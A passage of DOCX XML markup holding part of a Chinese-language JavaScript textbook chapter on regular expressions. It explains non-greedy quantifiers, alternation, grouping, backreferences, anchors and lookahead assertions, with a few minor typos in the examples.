        <w:t>10-3</w:t>
      </w:r>
      <w:r>
        <w:t>中列出的匹配重复字符是尽可能多地匹配，而且允许后续的正则表达式继续匹配。因此，我们称之为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>贪婪的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>匹配。我们同样可以使用正则表达式进行非贪婪匹配。只须在待匹配的字符后跟随一个问号即可：</w:t>
      </w:r>
      <w:r>
        <w:t>“??”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“+?”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“*?”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“{1,5}?”</w:t>
      </w:r>
      <w:r>
        <w:t>。比如，正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/a+/</w:t>
      </w:r>
      <w:r>
        <w:t>可以匹配一个或多个连续的字母</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>。当使用</w:t>
      </w:r>
      <w:r>
        <w:t>"aaa"</w:t>
      </w:r>
      <w:r>
        <w:t>作为匹配字符串时，正则表达式会匹配它的三个字符。但是</w:t>
      </w:r>
      <w:r>
        <w:t>/a+?/</w:t>
      </w:r>
      <w:r>
        <w:t>也可以匹配一个或多个连续字母</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>，但它是尽可能少地匹配。我们同样将</w:t>
      </w:r>
      <w:r>
        <w:t>"aaa"</w:t>
      </w:r>
      <w:r>
        <w:t>作为匹配字符串，但后一个模式只能匹配第一个</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用非贪婪的匹</w:t>
      </w:r>
      <w:r>
        <w:t>配模式所得到的结果可能和期望并不一致。考虑以下正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/a+b/</w:t>
      </w:r>
      <w:r>
        <w:t>，它可以匹配一个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>，以及一个</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>。当使用</w:t>
      </w:r>
      <w:r>
        <w:t>"aaab"</w:t>
      </w:r>
      <w:r>
        <w:t>作为匹配字符串时，它会匹配整个字符串。现在再试一下非贪婪匹配的版本</w:t>
      </w:r>
      <w:r>
        <w:t>/a+?b/</w:t>
      </w:r>
      <w:r>
        <w:t>，它匹配尽可能少的</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>和一个</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>。当用它来匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"aaab"</w:t>
      </w:r>
      <w:r>
        <w:t>时，你期望它能匹配一个</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>和最后一个</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>。但实际上，这个模式却匹配了整个字符串，和该模式的贪婪匹配一模一样。这是因为正则表达式的模式匹配总是会寻找字符串中第一个可能匹配的位置。由于该匹配是从字符串的第一个字符开始的，因此在这里不考虑它的子串中更短的匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="10_1_4_Xuan_Ze___Fen_Zu_He_Yin_Yong_"/>
      <w:r>
        <w:t>10.</w:t>
      </w:r>
      <w:r>
        <w:t>1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　选择、分组和引用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正则表达式的语法还包括指定选择项、子表达式分组和引用前一子表达式的特殊字符。字符</w:t>
      </w:r>
      <w:r>
        <w:t>“|”</w:t>
      </w:r>
      <w:r>
        <w:t>用于分隔供选择的字符。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>/ab|cd|ef/</w:t>
      </w:r>
      <w:r>
        <w:t>可以匹配字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"ab"</w:t>
      </w:r>
      <w:r>
        <w:t>，也可以匹配字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"cd"</w:t>
      </w:r>
      <w:r>
        <w:t>，还可以匹配字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"ef"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>/\d{3}|[a-z]{4}/</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的是三位数字或者四个小写字母。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，选择项的尝试匹配次序是从左到右，直到发现了匹配项。如果左边的选择项匹配，就忽略右边的匹配项，即使它产生更好的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>匹配。因此，当正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/a|ab/</w:t>
      </w:r>
      <w:r>
        <w:t>匹配字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"ab"</w:t>
      </w:r>
      <w:r>
        <w:t>时，它只能匹配第一个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正则表达式中</w:t>
      </w:r>
      <w:r>
        <w:t>的圆括号有多种作用。一个作用是把单独的项组合成子表达式，以便可以像处理一个独立的单元那样用</w:t>
      </w:r>
      <w:r>
        <w:t>“|”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>等来对单元内的项进行处理。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>/java(script)?/</w:t>
      </w:r>
      <w:r>
        <w:t>可以匹配字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"java"</w:t>
      </w:r>
      <w:r>
        <w:t>，其后可以有</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>也可以没有。</w:t>
      </w:r>
      <w:r>
        <w:t>/(ab|cd)+|ef/</w:t>
      </w:r>
      <w:r>
        <w:t>可以匹配字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"ef"</w:t>
      </w:r>
      <w:r>
        <w:t>，也可以匹配字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"ab"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"cd"</w:t>
      </w:r>
      <w:r>
        <w:t>的一次或多次重复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在正则表达式中，圆括号的另一个作用是在完整的模式中定义子模式。当一个正则表达式成功地和目标字符串相匹配时，可以从目标串中抽出和圆括号中的子模式相匹配的部分（我</w:t>
      </w:r>
      <w:r>
        <w:t>们将在本章随后的部分中看到如何取得这些匹配的子串）。例如，假定我们正在检索的模式是一个或多个小写字母后面跟随了一位或多位数字，则可以使用模式</w:t>
      </w:r>
      <w:r>
        <w:t>/[a-z]+\d+/</w:t>
      </w:r>
      <w:r>
        <w:t>。但假定我们真正关心的是每个匹配尾部的数字，那么如果将模式的数字部分放在括号中</w:t>
      </w:r>
      <w:r>
        <w:t>(/[a-z]+(\d+)/)</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以从检索到的匹配中抽取数字了，之后我们会有详尽的解释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>带圆括号的表达式的另一个用途是允许在同一正则表达式的后部引用前面的子表达式。这是通过在字符</w:t>
      </w:r>
      <w:r>
        <w:t>“\”</w:t>
      </w:r>
      <w:r>
        <w:t>后加一位或多位数</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>字来实现的。这个数字指定了带圆括号的子表达式在正则表达式中的位置。例</w:t>
      </w:r>
      <w:r>
        <w:t>如，</w:t>
      </w:r>
      <w:r>
        <w:t>\1</w:t>
      </w:r>
      <w:r>
        <w:t>引用的是第一个带圆括号的子表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>\3</w:t>
      </w:r>
      <w:r>
        <w:t>引用的是第三个带圆括号的子表达式。注意，因为子表达式可以嵌套另一个子表达式，所以它的位置是参与计数的左括号的位置。例如，在下面的正则表达式中，嵌套的子表达式</w:t>
      </w:r>
      <w:r>
        <w:t>([Ss]cript)</w:t>
      </w:r>
      <w:r>
        <w:t>可以用</w:t>
      </w:r>
      <w:r>
        <w:t>\2</w:t>
      </w:r>
      <w:r>
        <w:t>来指代：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/([Jj]ava([Ss]cript)?)\sis\s(fun\w*)/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对正则表达式中前一个子表达式的引用，并不是指对子表达式模式的引用，而指的是与那个模式相匹配的文本的引用。这样，引用可以用于实施一条约束，即一个字符串各个单独部分包含的是完全相同的字符。例如，下面的正则表达式匹配的就是位于单引号或双引号之内的</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个字符。但是，它并不要求左侧和右侧的引号匹配（即，加入的两个引号都是单引号或都是双引号）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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如果要匹配左侧和右侧的引号，可以使用如下的引用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/(['"])[^'"]*\1/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>\1</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的是第一个带圆括号的子表达式所匹配的模</w:t>
      </w:r>
      <w:r>
        <w:t>式。在这个例子中，存在这样一条约束，那就是左侧的引号必须和右侧的引号相匹配。正则表达式不允许用双引号括起的内容中有单引号，反之亦然。不能在字符类中使用这种引用，所以下面的写法是非法的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/(['"])[^\1]*\1/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本章随后几节中，我们会看到一种对带圆括号的子表达式的引用，这是正则表达式的检索和替换操作的强大特性之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同样，在正则表达式中不用创建带数字编码的引用，也可以对子表达式进行分组。它不是以</w:t>
      </w:r>
      <w:r>
        <w:t>“(”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“)”</w:t>
      </w:r>
      <w:r>
        <w:t>进行分组，而是以</w:t>
      </w:r>
      <w:r>
        <w:t>“(?:”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“)”</w:t>
      </w:r>
      <w:r>
        <w:t>来进行分组，比如，考虑下面这个模式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/([Jj]</w:t>
      </w:r>
      <w:r>
        <w:t>ava(?:[Ss]cript)?)\sis\s(fun\w*)/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里，子表达式</w:t>
      </w:r>
      <w:r>
        <w:t>(?:[Ss]cript)</w:t>
      </w:r>
      <w:r>
        <w:t>仅仅用于分组，因此复制符号</w:t>
      </w:r>
      <w:r>
        <w:t>"?"</w:t>
      </w:r>
      <w:r>
        <w:t>可以应用到各个分组。这种改进的圆括号并不生成引用，所以在这个正则表达式中，</w:t>
      </w:r>
      <w:r>
        <w:t>\2</w:t>
      </w:r>
      <w:r>
        <w:t>引用了与</w:t>
      </w:r>
      <w:r>
        <w:t>(fun\W*)</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>10-4</w:t>
      </w:r>
      <w:r>
        <w:t>对正则表达式的选择、分组和引用运算符做了总结。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4119113" cy="1492369"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="20" name="00020.jpeg" descr="000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00020.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="1492369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="272" w:name="10_1_5_Zhi_Ding_Pi_Pei_Wei_Zhi_"/>
      <w:r>
        <w:t>10.1.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　指定匹配位置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如前面所介绍的，正则表达式中的多个元素才能够匹配字符串的一个字符。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的只是一个空白符。还有一些正则表达式的元素匹配的是字符之间的位置，而不是实际的字</w:t>
      </w:r>
      <w:r>
        <w:t>符。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>\b</w:t>
      </w:r>
      <w:r>
        <w:t>匹配一个单词的边界，即位于</w:t>
      </w:r>
      <w:r>
        <w:t>\w</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>单词）字符和</w:t>
      </w:r>
      <w:r>
        <w:t>\W</w:t>
      </w:r>
      <w:r>
        <w:t>（非</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>单词）之间的边界，或位于一个</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>单词与字符串的开始或结尾之间的边界</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。像</w:t>
      </w:r>
      <w:r>
        <w:t>\b</w:t>
      </w:r>
      <w:r>
        <w:t>这样的元素不匹配某个可见的字符，它们指定匹配发生的合法位置。有时我们称这些元素为正则表达式的锚，因为它们将模式定位在搜索字符串的特定位置上。最常用的锚元素是</w:t>
      </w:r>
      <w:r>
        <w:t>^</w:t>
      </w:r>
      <w:r>
        <w:t>，它用来匹配字符串的开始，锚元素</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>用以匹配字符串的结束。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例如，要匹配单词</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>，可以使用正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/^JavaScript$/</w:t>
      </w:r>
      <w:r>
        <w:t>。如果想匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"Java"</w:t>
      </w:r>
      <w:r>
        <w:t>这个单词本身</w:t>
      </w:r>
      <w:r>
        <w:t>（不像在</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>中作为单词的前缀），可以使用正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/\s\Javas/</w:t>
      </w:r>
      <w:r>
        <w:t>，可以匹配前后都有空格的单词</w:t>
      </w:r>
      <w:r>
        <w:t>"Java"</w:t>
      </w:r>
      <w:r>
        <w:t>。但是这样做有两个问题，第一，如果</w:t>
      </w:r>
      <w:r>
        <w:t>"Java"</w:t>
      </w:r>
      <w:r>
        <w:t>出现在字符串的开始或者结尾，就匹配不成功，除非开始和</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>结尾处各有一个空格。第二个问题是，当找到了与之匹配的字符串时，它返回的匹配字符串的前端和后端都有空格，这并不是我们想要的。因此我们使用单词的边界</w:t>
      </w:r>
      <w:r>
        <w:t>\b</w:t>
      </w:r>
      <w:r>
        <w:t>来代替真正的空格符</w:t>
      </w:r>
      <w:r>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t>进行匹配（或定位）。这样正则表达式就写成了</w:t>
      </w:r>
      <w:r>
        <w:t>/\bJava\b/</w:t>
      </w:r>
      <w:r>
        <w:t>。元素</w:t>
      </w:r>
      <w:r>
        <w:t>\B</w:t>
      </w:r>
      <w:r>
        <w:t>将把匹配的锚点定位在不是单词的边界之处。因</w:t>
      </w:r>
      <w:r>
        <w:t>此，正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/\B[Ss]cript/</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"postscript"</w:t>
      </w:r>
      <w:r>
        <w:t>匹配，但不与</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"Scripting"</w:t>
      </w:r>
      <w:r>
        <w:t>匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任意正则表达式都可以作为锚点条件。如果在符号</w:t>
      </w:r>
      <w:r>
        <w:t>“(?=”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“)”</w:t>
      </w:r>
      <w:r>
        <w:t>之间加入一个表达式，它就是一个先行断言，用以说明圆括号内的表达式必须正确匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>，但并不是真正意义上的匹配。比如，要匹配一种常用的程序设计语言的名字，但只在其后有冒号时才匹配，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>/[Jj]ava([Ss]cript)?(?=\:)/</w:t>
      </w:r>
      <w:r>
        <w:t>。这个正则表达式可以匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript:The D</w:t>
      </w:r>
      <w:r>
        <w:t>efinitive Guide"</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>，但是不能匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"Java in a Nutshell"</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>"Java"</w:t>
      </w:r>
      <w:r>
        <w:t>，因为它后面没有冒号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>带有</w:t>
      </w:r>
      <w:r>
        <w:t>“(?!”</w:t>
      </w:r>
      <w:r>
        <w:t>的断言是负向先行断言，用以指定接下来的字符都不必匹配。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>/Java(?!Script)([A-Z]\w*)/</w:t>
      </w:r>
      <w:r>
        <w:t>可以匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"Java"</w:t>
      </w:r>
      <w:r>
        <w:t>后跟随一个大写字母和任意多个</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>单词，但</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>后面不能跟随</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Script"</w:t>
      </w:r>
      <w:r>
        <w:t>。它可以匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaBeans"</w:t>
      </w:r>
      <w:r>
        <w:t>，但不能匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"Javanese"</w:t>
      </w:r>
      <w:r>
        <w:t>；它可以匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>，但不能匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScr</w:t>
      </w:r>
      <w:r>
        <w:t>ipter"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>10-5</w:t>
      </w:r>
      <w:r>
        <w:t>总结了正则表达式中的锚。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4136366" cy="1651958"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="21" name="00021.jpeg" descr="00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00021.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4136366" cy="1651958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
